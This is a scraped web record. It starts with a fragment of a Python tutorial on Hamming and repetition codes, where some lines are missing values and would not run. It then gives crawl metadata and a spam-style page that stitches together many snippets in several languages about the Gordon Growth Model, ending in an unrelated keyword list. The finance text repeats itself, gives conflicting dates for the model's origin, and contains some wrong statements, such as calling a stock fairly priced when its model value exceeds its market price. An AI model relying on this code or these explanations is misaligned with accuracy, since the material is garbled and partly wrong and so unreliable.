** r):\nmatrix.append(decimalToVector(i, r))\n# Turn that matrix into a numpy data structure\nmatrix = np.matrix(matrix)\na = np.matrix(v)\n# Multiply the message by the parity check matrix mod 2\n# The line below this has errors when using test_up_to, errors on 2\nnumber = (a.dot(matrix) % 2).tolist()\n# Convert the list representing a number to the actual number\nnumber = int(\"\".join(str(x) for x in number), 2)\nif number==0:\nreturn v\n# Flip the bit in the message corresponding to number\nv[number - 1] = int(not v[number - 1])\nreturn v\n\n\n### Message from codeword\n\nThis recovers the message from the codeword of a Hamming code\n\ndef messageFromCodeword(c):\nif not checkvalid(c):\nreturn []\nr = 0\nl = len(c)\ncount = 0\n# Ensure the message is of length 2^r-r-1\nwhile 2 ** r - 1 < l:\nr += 1\n# If it is not of correct length, return an empty list\nif 2 ** r - 1 != l:\nreturn []\nfor i in range(0, r):\n# Removing indices corresponding to powers of 2\nc.pop(2 ** i - 1 - count)\ncount += 1\nreturn c\n\n\n## Repetition Codes\n\n### Repetition Encoder\n\nThis creates a repetition code\n\ndef repetitionEncoder(m, n):\nreturn m * n if m == or m == else []\n\n\n### Repetition Decoder\n\nThis recovers the message from a repetition code\n\ndef repetitionDecoder(v):\nreturn if v.count(0) > v.count(1) else if v.count(0) < v.count(1) else []" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.51879054,"math_prob":0.9910681,"size":2450,"snap":"2020-45-2020-50","text_gpt3_token_len":740,"char_repetition_ratio":0.14554374,"word_repetition_ratio":0.1,"special_character_ratio":0.33755103,"punctuation_ratio":0.0936255,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9994942,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T12:58:55Z\",\"WARC-Record-ID\":\"<urn:uuid:3ca7ce45-c8ac-474e-ad3c-79b5761bb012>\",\"Content-Length\":\"21591\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90d26eb3-fc98-4ea0-9d28-e093e4dac5fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:030063a6-1cfa-441e-980f-33a0da4acfd1>\",\"WARC-IP-Address\":\"76.76.21.21\",\"WARC-Target-URI\":\"https://samrobbins.uk/portfolio/error-correcting-codes/\",\"WARC-Payload-Digest\":\"sha1:UIMQBFJCVNX3GKYRXCOSBSP6DLS6IMUP\",\"WARC-Block-Digest\":\"sha1:GXTBSLXHNLLXR6QE26MZ7MJ7TAEBGXWK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107918164.98_warc_CC-MAIN-20201031121940-20201031151940-00517.warc.gz\"}"}
https://knihyzacal.com/terminal-value-gordon-growth-model-daah/too1334oqpx0
[ "Home\n\n# Gordon growth model\n\n### Gordon Growth Model - Guide, Formula, Examples and Mor\n\nThe Gordon Growth Model - also known as the Gordon Dividend Model or dividend discount model - is a stock valuation method that calculates a stock's intrinsic value, regardless of current market conditions. Investors can then compare companies against other industries using this simplified model What Is The Gordon Growth Model? First of all, the Gordon Growth Model is a tool to calculate the intrinsic value of a stock. And more specifically, the value of a dividend growth stock. Furthermore, you will hear this tool referred to as a constant perpetual growth model The Gordon Growth Model (GGM) is a method for the valuation of stocks. Investors use it to determine the relationship between value and return. The model uses the Net Present Value (NPV) of future dividends to calculate assets' intrinsic value. It's the most popular variation of the Dividend Discount Model (DDM). Myron J. Gordon (alongside other academicians) published the model in 1956. A strong influence was the work of John Burr Williams and his 1938 book on the theory of investment. Introduction to Gordon Growth Model The Gordon Growth Model is also called the dividend discount model is a kind of valuation of stock methodology where one uses it to calculate the intrinsic value of the stock and this model is very useful because it eliminates any externals factors like prevailing market conditions There is critical information that the Gordon model seeks to offer. Hence, the model has enjoyed widespread acceptance for predicting companies with a stable financial growth rate. The Gordon Growth Model helps to value the stock of a firm, and it does so via an assumption of a consistent rise in payments\n\n### Gordon Growth Model: Guide, Formula & 5 Examples\n\nWhat is the Gordon Growth Model? Gordon growth model is a type of dividend discount model in which not only the dividends are factored in and discounted but also a growth rate for the dividends is factored in and the stock price is calculated based on that Gordon Growth Model is based on the Dividend Discount Model (DDM) and was developed by Professor Myron J. Gordon of the University of Toronto in the late 1950s. Under the DDM, estimating the future dividends of a company could be a complex task since dividend payouts of companies may vary due to other factors such as market conditions, profitability, and so on. The GGM differs from the DDM in that it assumes a constant rate of growth of dividends The Gordon Growth Model (GGM) is a version of the dividend discount model (DDM). It is used to calculate the intrinsic value of a stock based on the net present value (NPV) of its future dividends. When Is the Gordon Growth Model Used? Investors use the Gordon Growth Model to determine the relationship between valuation and return La méthode de Gordon et Shapiro (en anglais, dividend discount model ou DDM) est un modèle d' actualisation du prix des actions. Il porte le nom de ses auteurs et a été mis au point en 1959. Ce modèle, dit aussi de « croissance perpétuelle », ne tient pas compte des plus values\n\nGordon Growth Model - Terminal Value. This consistent rate of growth is usually assumed to be very low and is known as the 'Terminal Growth Rate'. The growth rate must be between the GDP growth rate of the country and the inflation rate of the country. The growth rate must be higher than inflation and less than GDP because it is unreasonable to assume that into perpetuity (forever) that one. Das Gordon-Growth-Modell, auch bekannt als Dividendendiskontierungsmodell und Dividendenwachstumsmodell, ist eine Methode zur Berechnung des inneren Wertes (Intrinsic Value) einer Aktie, ohne Berücksichtigung der aktuellen Marktbedingungen.Das Modell setzt diesen Wert mit dem Barwert der zukünftigen Dividenden und dem Verkaufspreises der Aktie gleich - den zukünftigen Zahlungsströmen. What is the Gordon Growth Model? The Gordon Growth Model also bears the name of dividend discount model. It represents a way to calculate the intrinsic value of a stock not taking into account the current value of the stock in question. This model is based on several future dividends, which we assume should grow constantly Gordon Growth Model (2/3)Gordon Growth Model (2/3) • Consider a firm that is in a stable business, is expected to experience steady growth, is not expected to change its financial policies (in parti l fi i l l ) d th t t llticular, financial leverage), and that pays out all of its free cash flow as dividends to its equity holders. • We can price such a stock as the present value of its. This video is part of an online course, Financial Markets, created by Yale University. Learn finance principles to understand the real-world functioning of s..\n\n### Understanding The Gordon Growth Model For Stock Valuation\n\n1. Gordon growth model. The Gordon growth model (also called the constant growth model) is a special case of the dividend discount model which assumes a constant dividend growth rate. It is appropriate for the valuation of stock of companies who have achieved a mature growth rate and are insensitive to the business cycle. Under the Gordon growth model, the value of a stock equals expected cash dividend next year D 1 divided by the excess of the required rate of return (r) over the growth rate (g)\n2. The Gordon growth model (GGM) helps investors calculate the intrinsic value of a stock based upon future dividends that grow at a steady pace. It gets its name from Professor Myron Gordon of the..\n3. The term Gordon Growth Model refers to the method of stock valuation based on the present value of the stock's future dividends, irrespective of the current market conditions. The Gordon Growth Model is also referred to as the dividend discount model\n4. Gordon Growth Model Formula is used to find the intrinsic value of the company by discounting the future dividend payouts of the company. There are two formulas of Growth Growth Model #1 - Gordon Growth in Future Dividends #2 - Zero Growth in Future Dividend\n5. Get the template: http://www.smarthelping.com/2016/08/explaining-gordon-growth-model-for.html Explore all of smarthelping's financial models: http://www.smar..\n6. The Gordon Growth Model is known as the dividend discount model or DDM but without the current market stipulations, meaning the factors that influence the market, such as competitors, business challenges, etc. The point of this Gordon Growth model is to relate the current intrinsic value of stocks to the value of a stock's future dividends. This is a very old model but still actual and.\n\nThe Gordon Growth Model (GGM) is a method for the valuation of stocks. Investors use it to determine the relationship between value and return. The model uses the Net Present Value (NPV) of futur The equation most widely used is called the Gordon growth model (GGM). It is named after Myron J. Gordon of the University of Toronto, who originally published it along with Eli Shapiro in 1956 and made reference to it in 1959 Invented in the 1950s by Myron Gordon, the Gordon Growth Model is a financial equation used to determine the value of a stock. As a different take on the discounted cash flow model, the equation takes into account the dividend per share, rate of return, and dividend growth rate The Gordon Growth Model is especially useful for companies that have a great cash inflow and the company has stability with dependable leverage patterns. The valuation can be easily performed since the inputs of data for Gordon's Growth model are readily available for computation The Gordon Growth Model (GGM) is a popular model in finance and is commonly used to determine the value of a stock using future dividend payments. The model is named after Myron Gordon, an American economist, who popularized this model in the 1960s. In simple terms, the Gordon Growth Model calculates the present value of a future series of dividend payments. Here, the assumption is that future.\n\n### Gordon Growth Model Complete Guide to the Gordon Growth\n\n• GORDON GROWTH MODEL. A while back, specifically in the 1960s, Myron Gordon, an American economist, developed a model which can be used to estimate the constant growth of a stock of a certain company. This is a version of the DDM, but instead of showing the current value of a stock, this model is focused on showing the constant growth. At first, it seems complex, but this is one of the easiest.\n• The growth rate in earnings and dividends would have to be 3.12% a year to justify the stock price of $30.00. Illustration 2: To a financial service firm: J.P. Morgan A Rationale for using the Gordon Growth Model • As a financial service firm in an extremely competitive environment, it is unlikely that J.P. Morgan's earnings are going to gro • Also known as Gordon Dividend Model, the Gordon Growth Model assumes that a firm is expected to achieve a steady growth, will maintain a stable financial leverage, and will pay out its free cash flows to its shareholders in the form of dividends. This model assumes that the dividend per share grows at a constant rate in perpetuity and therefore, the present value of a firm is calculated based on this assumption The Gordon Growth Model, for example, is a subset of a larger group of models known as Dividend Discount Models. The model states that the value of a stock is the expected future sum of all of the dividends. If the predicted value is higher than the actual trading price, then the share is priced fairly Gordon Growth Model is a model to determine the fundamental value of stock based on a future series of dividends that grow at a constant rate The Gordon Growth Model is named after economist Myron J. Gordon of the University of Toronto, who originally published the model along with Eli Shapiro in 1956. Also known as the Dividend Discount Model, Gordon's model is used for valuing stocks that pay regular dividends that are expected to grow at a constant rate", null, "The Gordon Growth Model (GGM) is a tool used to value a firm. This theory assumes that the company is worth the sum of all future dividend payments discounted to the valued today (i.e.present value). It can also be called Dividend Discount Model The Gordon Growth Model assumes steady growth and steady discount rates but this isn't realistic. The economy ebbs and flows. Many investment trends are at play. And here's one big example, the average investor's required rate of return is much lower today than when interest rates peaked in the 1980s The Gordon growth model is a well known and widely known model for valuing equity securities. However, as with every model, there are some pros and cons that need to be understood before this model is applied. Understanding of these pros and cons will help differentiating between situations wherein it would be prudent to apply the Gordon growth model and situations wherein that would not be. Gordon Growth Model Check on Investopedia and LIT. Resume lesson #4 Under the Don't put all your eggs in one basket analogy, the eggs represent individual investments and the basket represents the overall investment portfolio. Spreading your eggs around allows you to: minimize the possibility that bad luck for a single investment adversely affects your overall portfolio. This is. The Gordon growth model is a simple discounted cash flow (DCF) model which can be used to value a stock, mutual fund, or even the entire stock market. The model is named after Myron Gordon who first published the model in 1959. The Gordon model assumes that a financial security pays a periodic dividend (D) which grows at a constant rate (g). These growing dividend payments are assumed to. Limitations of the Gordon Growth Model: 1) The main limitation of the Gordon growth model lies in its assumption of a constant growth in dividends per share. In reality, it is highly unlikely that companies will have their dividends increase at a constant rate. 2) The calculations are basically on future assumptions, which can be subjected to market changes based on the economic conditions and. The Gordon Growth model is an offshoot of the standard dividend discount model. This model is used primarily to calculate the intrinsic value of a firm based on the discounted value of future dividends 1 I. THE STABLE GROWTH DDM: GORDON GROWTH MODEL The Model : Value of Stock = DPS1/ ( r - g) where DPS1= Expected Dividends one year from now r = Required rate of return for equity investors g = Annual Growth rate in dividends forever A BASIC PREMISE • This infinite growth rate cannot exceed the growth rate for the overall economy (GNP) by more. The Gordon Growth Model works best to value the stock price of mature companies with low to moderate growth rates. It does not lend itself to accurate valuations for high-growth companies in the early stages of development. If a company does not pay a dividend, earnings per share can be substituted The Gordon Growth Model (GGM) is a popular model in finance and is commonly used to determine the value of a stock using future dividend payments. The model is named after Myron Gordon, an American economist, who popularized this model in the 1960s. In simple terms, the Gordon Growth Model calculates the present value of a future series of dividend payments. Here, the assumption is that future dividends will grow at a constant rate and will continue forever. Because of this assumption, this. What is Gordon Growth Model, This model is use to determine the fundamental value of stock, it determines the value of stock based on sequence or series of dividends that matured at a constant rate , and the dividend per share is payable in a year Stock Value (P) = D / (k - G)-----Equation 1 Where D= Expected dividend per share one year from now G= Growth rate in dividends k= required. Use the Gordon Growth Model and CAPM (5Y) to calculate the intrinsic value of the 3 stocks. Which case works and which case does not work? Explain why. You may need to use Factiva or Yahoo Finance. Show transcribed image text. Expert Answer . Previous question Next question Transcribed Image Text from this Question. Sector - ICB Liab/Equity Revenue Dividends 163.78 48.92 91.29 EPS Market Cap. Gordon Growth Model. Gordon Growth Model is the method which use to calculate stock's intrinsic value without the consideration of current market value. The value depends on the present value of stock future dividends which we expect to receive in the future. The dividend expects to grow at a certain rate base on past experience The Gordon Growth model is used to derive a fair stock price based on current dividend payments and the anticipated growth rate. Defining The Gordon Growth Model The Gordon Growth Model was.. ### Gordon Growth Model - Guide, Formula, Examples and Pros Criticism of Gordon's Model It is assumed that firm's investment opportunities are financed only through the retained earnings and no external financing viz. Debt or equity is raised. Thus, the investment policy or the dividend policy or both can be sub-optimal. The Gordon's Model is only applicable to all equity firms Gordon Growth Model. A simple model to estimate the value of a stock. The model assumes one knows the dividend per share in the stock one year hence and, more importantly, that the dividends will grow at a constant rate indefinitely The Gordon growth model (GGM) is a method that is often used to calculate the terminal value in a DCF method analysis. This terminal value estima-tion model can be sensitive to the expected long-term growth (LTG) rate.6 Because a small change to the LTG rate can have a large impact on the concluded value, the LTG rate is often one of the disputed variables in valuations prepared for foren-sic. The Gordon growth model (GGM) is a commonly used version of the dividend discount model (DDM). The model is named after finance professor Myron Gordon and first appeared in his article Dividends, Earnings and Stock Prices, which was published in the 1959 edition of Review of Economics and Statistics The answer lies in the Gordon Growth Model. The formula for the Gordon Growth Model is as follows: g = terminal growth rate. r = Weighted Average Cost of Capital (WACC) D0 = Cash flow in year 5. Stable Growth Model or Gordon Growth Model As our company grows, it becomes more difficult to maintain that growth. Eventually, the company will grow at a rate less than that and return to earth and grow at a rate equal or less than the economy the company operates within ### Gordon Growth Model Stable & Multi-Stage Valuation Model The equation most widely used is called the Gordon growth model. It is named after Myron J. Gordon of the University of Toronto, who originally published it along with Eli Shapiro in 1956 and made reference to it in 1959; although the theoretical underpin was provided by John Burr Williams in his 1938 text The Theory of Investment Value. The Gordon Model is as important to valuation.  The Solow Growth Model Economics 202 14 April 2014 Statement on plagiarism: I understand that plagiarism is a serious offence and confirm that unless otherwise acknowledged the content of this essay is my own. Economic growth rates across countries are hardly ever the same and the Solow-growth model is the starting point at determining why growth rates differ across countries (Burda and. ### Gordon Growth Model Formula, Example, Analysis The most common and straightforward calculation of a DDM is known as the Gordon growth model (GGM), which assumes a stable dividend growth rate and was named in the 1960s after American economist.. The Gordon Growth Model. Chapter One began with a discussion of investment principles in a perfect capital market characterised by certainty. According to Fisher's Separation Theorem (1930), it is irrelevant whether a company's future earnings are paid as a dividend to match shareholders' consumption preferences at particular points in time. If a company decides to retain profits for. The Gordon Growth Model is a simplified version of one of several models examined by MJ Gordon in his 1959 paper. It values a security using the discounted value of future dividends assuming a fixed growth rate: d/(r - g) Where d is the next dividend, r is the required rate of return, and, g is the rate of dividend growth. This is simply the usual DCF formula simplified for a fixed discount. Le terme «Gordon Growth Model» fait référence à la méthode d'évaluation des actions basée sur la valeur actuelle des dividendes futurs de l'action, quelles que soient les conditions de marché actuelles. Le modèle de croissance Gordon est également appelé modèle d'actualisation des dividendes. La formule s'applique uniquement aux actions versant des dividendes et la formule pour l. The justified P/B ratio is based on the Gordon Growth Model. It uses the sustainable growth relation and the observation that expected earnings per share equal book value times the return on equity. On this page, we provide the justified price-to-book formula, interpret the ratio, and implement a justified P/B multiple example in Excel. The spreadsheet is available at the bottom of the page. The Gordon Growth Model can now tell me what the FTSE 100 should be worth: P=D 1 /(r-g) P=191.81/(0.08-.03) (8% and 3% are expressed as decimals in the model) P=191.81/.05 P=3,836; Our. ### Gordon Growth Model Formula & Examples InvestingAnswer • Gordon growth model (Constant growth dividend discount model): assumes that dividends will grow indefinitely at a constant growth rate.The value of the stock is calculated as: Calculate the value of a stock that paid a$10 dividend last year, if dividends are expected to grow forever at 6% and the required rate of return on equity is 8%\n• Gordon (Constant) Growth Dividend Discount Model. As the name implies, the Gordon (constant) growth dividend discount model assumes dividends grow indefinitely at a constant rate. $$V_0=\\frac{D_1}{r-g}$$ Where: D 1 = expected dividends in year 1 . Note that this is of the utmost importance in your calculation\n• According to the Gordon Growth Model, the price of stocks depend on the following except OA the most recent dividend paid B. return on Treasure bili OC expected constant growth rate in dividends OD required retum on investments When your required retum on an equity investment increases then according to the Gordon Gown Model you will be willing to pay for investment Suppose that a stock is.\n• Gordon Growth Method Intuition. The basic intuition here is that we can pay: Annual Free Cash Flow / Discount Rate. For an investment, if the cash flow stays the same each year and we're targeting a specific yield on our investment (known as the discount rate in a DCF)\n• The Gordon growth model is a simple and convenient way of valuing stocks but it is extremely sensitive to the inputs for the growth rate. Used incorrectly, it can yield misleading or even absurd results, since, as the growth rate converges on the discount rate, the value goes to infinity. Consider a stock, with an expected dividend per share next period of $2.50, a cost of equity of 15%, and. • Constant-growth model — Also called the Gordon Shapiro model, an application of the dividend discount model which assumes (1) a fixed growth rate for future dividends and (2) a single discount rate. The New York Times Financial Glossary The Gordon Growth Model is a very old and very useful stock valuation model. It's based on the insight that the value of stock today is the present value of all future dividends the stock holder will receive. If one can argue the dividends will grow at a constant rate, then we can use the simple Gordon model: where P is the value of the stock today, D is the dividend in one year (normally), r. Definition: Dividend growth model is a valuation model, that calculates the fair value of stock, assuming that the dividends grow either at a stable rate in perpetuity or at a different rate during the period at hand. What Does Dividend Growth Model Mean? What is the definition of dividend growth model? The dividend growth model determines if a stock is. Some obvious candidates for the Gordon Growth Model. Regulated Companies, such as utilities, because . their growth rates are constrained by geography and population to be close to the growth rate in the economy in which they operate. they pay high dividends, largely again as a function of history they have stable leverage (usually high) Large financial service companies, because . their size. The dividend discount model (DDM) is a method of valuing a company based on the theory that a stock is worth the discounted sum of all of its future dividend payments. In other words, it is used to value stocks based on the net present value of the future dividends.The equation most widely used is called the Gordon growth model.It is named after Myron J. Gordon of the University of Toronto. Do not forget that Gordon's growth model and the use of the dividend-discount model as an all, is quite sensitive to the assumptions that you use, particularly in what refers to the growth rate and to the perceived cost of equity. For that reason, this model is more adequate for companies where foreseen growth is slow. Next Section: 3.2.3. Capital Asset Pricing Model (CAPM) Learning Center. What Is the Gordon Growth Model (GGM)? The Gordon Growth Model (GGM) is used to determine the intrinsic value o ### Méthode de Gordon et Shapiro — Wikipédi • Capitalization Rate - Gordon Growth Model. In financial theory, a perpetuity is a set of cash flows that will continue into infinity and the formula is identical to the formula defined above for the cap rate method. The valuation method treats the income received by the property as income that will continue forever; however, there would be some amount of expected growth. As an owner of an. • Gordon Growth Modelは、市場の状況の変化にかかわらず、株価を計算します。投資家はさまざまな業界の企業の評価を比較できるため、これは重要です。 仮定. ゴードン成長モデルは次のように仮定しています� • De term Gordon Growth Model verwijst naar de methode van aandelenwaardering op basis van de contante waarde van de toekomstige dividenden van het aandeel, ongeacht de huidige marktomstandigheden. Het Gordon-groeimodel wordt ook wel het dividendkortingsmodel genoemd. De formule is alleen van toepassing op dividenduitkerende aandelen en de formule voor de aandelenwaardering wordt berekend door. ### What Is The Gordon Growth Method? Wall Street Oasi The Gordon Growth Model in Practice. For example, if a company lists its stock price at$50, has a required rate of return at 15% (r), pays a dividend of $1 per share you own, and has a constant growth rate of 6% then how would you calculate the stock value?$1 ÷ (0.15 - 0.06) = \\$11.11 The model would not be practical if the growth rate is equal or more than the required rate of return. It. The Gordon growth model simply assumes that the dividends of a stock keep of increasing forever at a given constant rate. Let us understand this with the help of an example. Example: Let's say that an analyst wants to forecast the value of a given stock. He is using the dividend discount model to do so. He selects a 5 year horizon period for which he will project the most accurate possible. Gordon Growth Model: cours de bourse = (paiement du dividende dans la période suivante) / (coût des capitaux propres - taux de croissance du dividende) Les avantages du modèle de croissance Gordon sont qu'il est le modèle le plus couramment utilisé pour calculer le prix des actions et qu'il est donc le plus facile à comprendre. Il valorise le stock d'une entreprise sans prendre en compte. Gordon model calculator assists to calculate the constant growth rate (g) using required rate of return (k), current price and current annual dividend. Code to add this calci to your website Just copy and paste the below code to your webpage where you want to display this calculator\n\nGordon Growth Model. With the basic DDM equation, we assume an infinite/constant series of cash dividends. To add complexity to the model, we can include an estimate of the growth rate, (g), for the dividends, so that they increase over time. In practice, this works best for mature companies in non-cyclic industries, like utility companies. This model is called the Gordon Growth Model. Gordon. The Gordon growth model assumes that: Dividends grow at a constant growth rate g. Discount rate r is constant and is greater than g. Dividends bear and understandable and consistent relationship with profits. The value of a stock using the Gordon growth model is: If prices are efficient (price equals value), the price is expected to grow at a rate of g, known as the rate of price appreciation. E.27.1 The Gordon growth model[???work in progress] In Section 22.2.1 we describe an application of linear valuation theory based on the discounted cash-flow model, according to I got this email from Mike Adhikari informing me about the Advanced Growth Model that he introduced as a better model compared to over-simplified capital structure assumption in the Gordon Growth Model. Hello Sukarnen: Capitalization 2.0 will be released at the NACVA Conference on June 5th, 2019. The current single-period capitalization method, and the method used [ Gordon and Shapiro (1956) apply the one-stage constant growth model to dividends, assuming that they grow at a constant rate g: (3b) PVE 0 = Div 1 K E - g In this case, K E can also be expressed as follows\n\n### Das Dividendendiskontierungsmodell / Gordon-Growth-Model\n\n• The simplest form of the Dividend Discount Model is the Gordon Growth Model, named after the American economist Professor Myron J. Gordon. GGM assumes the company's business will last indefinitely and the dividend payments increase at a constant rate year to year. If the value calculated is higher than the current trading price, the stock is undervalued and may qualify as a signal to buy. On.\n• es.\n• Gordon Growth Model Gordon Growth Model The Gordon Growth Model - also known as the Gordon Dividend Model or dividend discount model - is a stock valuation method that calculates a stock's intrinsic value, regardless of current market conditions. Investors can then compare companies against other industries using this simplified model ; Multiple-Period Dividend Discount Model Multiple.\n• The Gordon Growth Model is also referred to as the dividend discount model. The formula is applicable for dividend-paying stocks only and the formula for the stock valuation is computed by dividing the next year's dividend per share by the difference between the investor's required rate of return and dividend growth rate. Mathematically, it is represented as\n\n### What is the Gordon Growth Model? A Definition and Example\n\nGordon Growth Dividend Model Criticism. No external Financing: The model assumes that company finances with retained earnings only. It does not look for external financing. However in reality a company go for a blend of internal as well as external financing. Constant return: Gordon's model is based on the assumption that returns are constant. Gordon Growth Model is great as it allows for a simple and rememberable way to simplify quite complex value calculations. The formula is one of the fundamentals of modern investment analysis. Yet it has its limitations and hidden assumptions that should be taken into consideration when creating your own financial models\n\n1. The Gordon Growth Model assesses the reason of dividend growth. If all earnings of a company are distributed as dividend the company will not have additional capital to invest. The Gordon Growth model formula is given below: G = bR. b = The proportion of earnings retained. R = The rate that profits are earned on new investments . Modigliani and Miller's dividend irrelevancy theory. According.\n2. Gordon Growth Model in Excel. We have developed Gordon Growth Model in Excel template that you can use to value any stock using this model. The excel template also showcases the Duke Energy example as shown above. The excel template makes use of the MarketXLS hf_ functions to fetch all market data\n3. The dividend discount model (DDM or the Gordon Growth Model) is a method of valuing a company's stock price based on the theory that its stock is worth the sum of all of its future dividend payments discounted back to their present value. The short-form of the dividend discount model just takes a multiple of pro forma dividend payments. It certainly has its limitation in practical use.\n4. You may want to perform a valuation calculation on your investments to ensure you're not overpaying. There are many different methods to this madness, but the Gordon growth model is particularly well suited for companies with steady dividend growth. Here's a closer look at this valuation technique. What is the..\n5. Considering a fact that I am currently, at my International Financial Risk Management Course, covering Gordon's Growth (also known as Dividend Discount) Model, I take a bit of time to shed some light on this excellent piece of Financial Theory and shed some light on various legal structures (C-Corporations vs. REITs).. The Gordon Growth Model — otherwise described as the dividend.\n\n### Gordon Growth Model - Financial Markets by Yale University\n\nGordon Growth Model: The Gordon growth model is also called a dividend discount model. It will help to use to determine the intrinsic worth of stock supported a future series of dividends that grow at a continuing rate. Most of the investors can compare companies against other industries in the simple method. These are one of the types of growth models in the stock. The formula of the Gordon.", null, "A model for determining the intrinsic value of a stock, based on a future series of dividends that grow at a constant rate. Given a dividend per share that is payable in one year, and the assumption that the dividend grows at a constant rate i The Gordon growth model is a variant of the discounted cash flow model. Expected Return on Investment (Gordon Growth Model) This website may use cookies or similar technologies to personalize ads (interest-based advertising), to provide social media features and to analyze our traffic\n\n### Gordon growth model vs multi-stage dividend discount model\n\n2. Gordon Growth Discount Model. The Gordon growth discount model defers slightly from the other methods. This model assumes the dividends will increase at the same rate indefinitely. To get the intrinsic value of the company, dividends are forecasted to the next period and then dividend by (cost of equity - growth rate). Why does it matter? This dividend discount model template provides an easy.\n3. e what the value of the proposed company's stock would be in time to come. Continue reading for more information about this model. Understanding the Gordon Growth Model. You may be hearing about this model for the first time or have heard but didn't pay much attention or consider how relevant it is.\n\nThe Barro-Gordon Model M. McMahon University of Warwick July 29, 2014 This note outlines the Barro-Gordon model of time-consistent monetary policy, dis-cussing the meaning of the equations and how to solve the model. I also present a game-theoretic outline of what is going on in the model which may help some of you to understand the material more easily. This note is not a substitute for. M. J. Gordon* T HE three possible hypotheses with respect to what an investor pays for when he ac- quires a share of common stock are that he is buying (i) both the dividends and the earnings, (2) the dividends, and (3) the earnings. It may be argued that most commonly he is buying the price at some future date, but if the future price will be related to the expected dividends and/or earnings. Under this model the share price is calculated as the present value of all future dividend payments that the investor expects to receive from the share held. It is assumed that the dividends are paid in perpetuity (forever) and that the dividends grow at a constant rate each year. This model is also called the Gordon Growth Model, named after Myron Gordon Unlike a lengthy cash flow analysis, the Gordon Growth Model allows any expected growth to be incorporated (as a constant) into an assumed perpetual income stream. The approach is not only reasonably simple, but incorporates an inflated reversionary value as part of the perpetually growing income stream. The overall rate of return, including the income growth component, allows the appraiser to.\n\nGordon Growth Model is a model to determine the fundamental value of stock, based on the future sequence of dividends that mature at a constant rate, provided that the dividend per share is payable in a year, the assumption of the growth of dividend at a constant rate is eternity, the model helps in solving the present value of the infinite series of all future dividends. Since the assumption. Gordon growth model (Dividend discount model) uses the assumed relationship of the constantly growing dividend amount received in perpetuity and the share price and is used to : calculate market value of share (equity) = present value of future dividends; P 0 = D 1 / (K e - g) calculate cost of equity (or required rate of return) K e = (D 1 /P 0) + g . where: K e = cost of equity. D 1. In the Gordon Growth (dividend discount) Model, the growth rate is assumed to be the required return on equity. O a. proportional to O b. Blank equal to O d. greater than e. less than fullscreen. check_circle Expert Answer. Want to see the step-by-step answer? See Answer. Check out a sample Q&A here. Want to see this answer and more? Experts are waiting 24/7 to provide step-by-step solutions. Gordon growth model, also known as 'Constant Growth Rate DCF Model', has been named after Professor Myron J. Gordon. As the name implies, this model works on the underlying assumption that the company will continue to pay the dividend amount as a fixed multiple of growth in the future, as it is paying now Gordon growth model is based on the dividend discount model, and helps in deriving a target price-to-tangible book at which the bank should ideally trade, considering the sustainable return on tangible equity (RoTE), cost of equity (CoE) and earnings growth rates (g). The biggest attractiveness of GGM is its simplicity and intuitive attractiveness", null, "### What Is the Gordon Growth Model? The Motley Foo\n\n1. The PV of a growing perpetuity is calculated through the Gordon Growth Model, a financial formula used with the time value of money. Present Value = Payment Amount ÷ (Interest Rate - Payment Growth Rate) Where: Payment is the payment each period. Rate of Return is a decimal rate of return per period (the calculator above uses a percentage). A return of 2.2% per period would be.\n2. Das Gordon Growth Model (auch Dividendenwachstumsmodell bezeichnet) ist ein nach M.J. Gordon benanntes Modell zur Berechnung des Wertes einer Investition unter der Annahme eines gleichbleibenden Wachstums der Dividenden berechnet, das zu den Discounted Cash-Flow-Verfahren der Unternehmensbewertung gehört und eines der meist genutzten Verfahrens zur Berechnung des Endwerts einer Investition ist\n3. Gordon Growth Model Formula Calculator (Excel template\n4. Gordon Growth Model Formulas Calculation Example\n5. Explaining Gordon Growth Valuation Technique in Excel\n7. Understanding the Gordon Growth Model for Stock Valuation", null, "### Dividend discount model - Wikipedi\n\n1. What is the Gordon Growth Model? - wiseGEE\n2. Gordon Growth Model - readyratios\n3. Gordon Growth Model (GGD) - Financial Edge Trainin\n4. The Definitive Guide to Gordon Growth Model Cleveris", null, "", null, "• Stage production artistique.\n• Comment fonctionne le cerveau humain.\n• Accord salt 2.\n• Nouveau emoji 2018.\n• Pals costa brava.\n• Antenne comble brico depot.\n• Sam heughan vie privée.\n• Constantijn des pays bas.\n• Meuble maquillage conforama.\n• Transport fluviaux de voyageurs.\n• Sequelles episiotomie.\n• Private practice dernier episode.\n• Autorégulation synonyme.\n• Nombre d etat en afrique du sud.\n• Brancher thermostat sur circulateur ou bruleur.\n• Beauty and the beast.\n• Chalet a vendre france voisine.\n• Guitalele avis.\n• Étreinte synonyme en 7 lettres.\n• Indifference a tout.\n• The demogorgon.\n• Garage moto 95.\n• Online dating script.\n• Immatriculation luxembourg resident francais.\n• Touage.\n• Sejour peche a la carpe.\n• Elle uk horoscope monthly.\n• Mots de 4 lettres commencant par n.\n• Ligament croisé bras.\n• Hunger games 3 streaming youtube.\n• Remplacement medecine generale nouvelle caledonie.\n• Pierre diamant lithotherapie.\n• تحميل رواية احببتها رغما عني pdf.\n• Etude de cas 2019.\n• Les pieds sur terre frissons.\n• Golfeur gaucher celebre.\n• Sujet bac espagnol 2018 erasmus.\n• Karaoké karafun.\n• Salon de l'immobilier montpellier." ]
[ null, "https://knihyzacal.com/xrlove/gMickrQWE6pCcV_zwyB3TAHaEK.jpg", null, "https://knihyzacal.com/xrlove/3qZItehhEXw.jpeg", null, "https://knihyzacal.com/xrlove/9R72Qr6qrg7CY_2jfThvPQHaFl.jpg", null, "https://knihyzacal.com/xrlove/t4VgOVBRAq19XMW1KWggJwHaDq.jpg", null, "https://knihyzacal.com/xrlove/8mLPIoZ48fal9GJaavVicAHaFj.jpg", null, "https://knihyzacal.com/xrlove/OCFSBvmFKXpaUFfoEDl_ngHaEL.jpg", null ]
